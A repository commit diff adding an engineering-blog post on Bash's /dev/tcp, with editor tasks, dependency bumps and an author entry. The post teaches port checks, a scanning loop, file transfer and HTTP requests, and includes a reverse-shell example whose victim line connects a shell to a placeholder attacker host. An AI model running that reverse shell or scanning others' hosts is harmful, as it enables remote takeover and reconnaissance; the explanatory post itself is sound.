post about /dev/tcp

.vscode/tasks.json

@@ -0,0 +1,34 @@
+{
+    "version": "2.0.0",
+    "tasks": [
+      {
+        "command": "rvm install ruby-2.5.1; rvm use 2.5.1; gem install bundler:2.1.4; bundle update",
+        "type": "shell",
+        "label": "Jekyll - Install Dev Server",
+        "options": {
+          "shell": {
+            "args": [
+              "--login"
+            ]
+          }
+        },
+        "problemMatcher": [],
+        "group": {
+          "kind": "test",
+          "isDefault": true
+        }
+      },
+      {
+        "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost",
+        "type": "shell",
+        "label": "Jekyll - Run Dev Server",
+        "options": {
+          "shell": {
+            "args": [
+              "--login"
+            ]
+          }
+        }
+      }
+    ]
+  }

Gemfile.lock

@@ -1,18 +1,18 @@
 GEM
   remote: https://rubygems.org/
   specs:
-    addressable (2.8.1)
+    addressable (2.8.4)
       public_suffix (>= 2.0.2, < 6.0)
     colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.2.2)
     em-websocket (0.5.3)
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0)
     eventmachine (1.2.7)
     ffi (1.15.5)
     forwardable-extended (2.6.0)
     http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.13.0)
       concurrent-ruby (~> 1.0)
     jekyll (4.0.1)
       addressable (~> 2.4)
@@ -41,8 +41,8 @@ GEM
       rexml
     kramdown-parser-gfm (1.1.0)
       kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.8.0)
       rb-fsevent (~> 0.10, >= 0.10.3)
       rb-inotify (~> 0.9, >= 0.9.10)
     mercenary (0.3.6)
@@ -64,9 +64,9 @@ GEM
     terminal-table (1.8.0)
       unicode-display_width (~> 1.1, >= 1.1.1)
     thread_safe (0.3.6)
-    tzinfo (1.2.10)
+    tzinfo (1.2.11)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2022.7)
+    tzinfo-data (1.2023.3)
       tzinfo (>= 1.0.0)
     unicode-display_width (1.8.0)
     wdm (0.1.1)

_data/authors.yml

@@ -19,3 +19,6 @@ tim_fraczak:
 david_suh:
     name: David Suh
     title: Software Engineer - Enterprise
+stefanos_kalandaridis:
+    name: Stefanos Kalandaridis
+    title: Site Reliability Engineer

_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md

@@ -0,0 +1,104 @@
+---
+layout: post
+title: Bash-ing your network with /dev/tcp
+excerpt: "In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network.
+
+Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems.
+
+/dev/udp is also valid."
+author: stefanos_kalandaridis
+categories:
+- troubleshooting
+- networking
+- security
+tags:
+- bash
+- networking
+- http
+- security
+---
+## /dev/tcp is a file descriptor of bash shell
+
+In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network.
+
+Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems.
+
+/dev/udp is also valid.
+
+- [Port Scanning](#port-scanning)
+- [Read TCP stream](#read-tcp-stream)
+- [File Transfer](#file-transfer)
+- [Reverse Shell](#reverse-shell)
+- [HTTP Requests](#http-requests)
+
+### Port scanning
+#### One of the most common uses of it is to check if a port is open in a remote host
+```
+timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && echo "open" || echo "closed"
+```
+
+#### This can be extremely usefull in cases where a machine/container doesn't have nc, curl, wget or any other utility to check for network connection
+Let's say we are in a kubernetes pod that runs on a minimal image having bash. We want to check if it can communicate with a service or if the service is actually listening on a port.
+```
+kubectl exec -it svc/random-service -- bash
+$ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed"
+```
+
+#### You can make a port scanner with it (and it's pretty fast)
+```
+for port in {1..8888}; do
+  echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"
+done
+```
+
+### Read TCP stream
+#### Get the time from nist.gov
+```
+cat < /dev/tcp/time.nist.gov/13
+```
+
+### File Transfer
+#### Option 1
+Sender
+```
+nc -lvnp 7777 < file.txt
+```
+Receiver
+```
+cat < /dev/tcp/sender/7777 > file.txt
+```
+
+#### Option 2
+
+Receiver
+```
+nc -lvnp 7777 > file.txt
+```
+Sender
+```
+cat file.txt > /dev/tcp/receiver/7777
+```
+
+### Reverse Shell
+#### Attacker
+```
+nc -lvnp 7777
+```
+#### Victim
+```
+bash -c 'bash -i >& /dev/tcp/attacker/7777 0>&1'
+```
+
+### HTTP Requests
+#### Fetching the `www.google.com` page
+```
+exec 5<>/dev/tcp/www.google.com/80
+echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&5
+cat <&5
+```
+
+
+
+### References 
+- [https://tldp.org/LDP/abs/html/devref1.html](https://tldp.org/LDP/abs/html/devref1.html)
+- [https://w0lfram1te.com/exploring-dev-tcp](https://w0lfram1te.com/exploring-dev-tcp)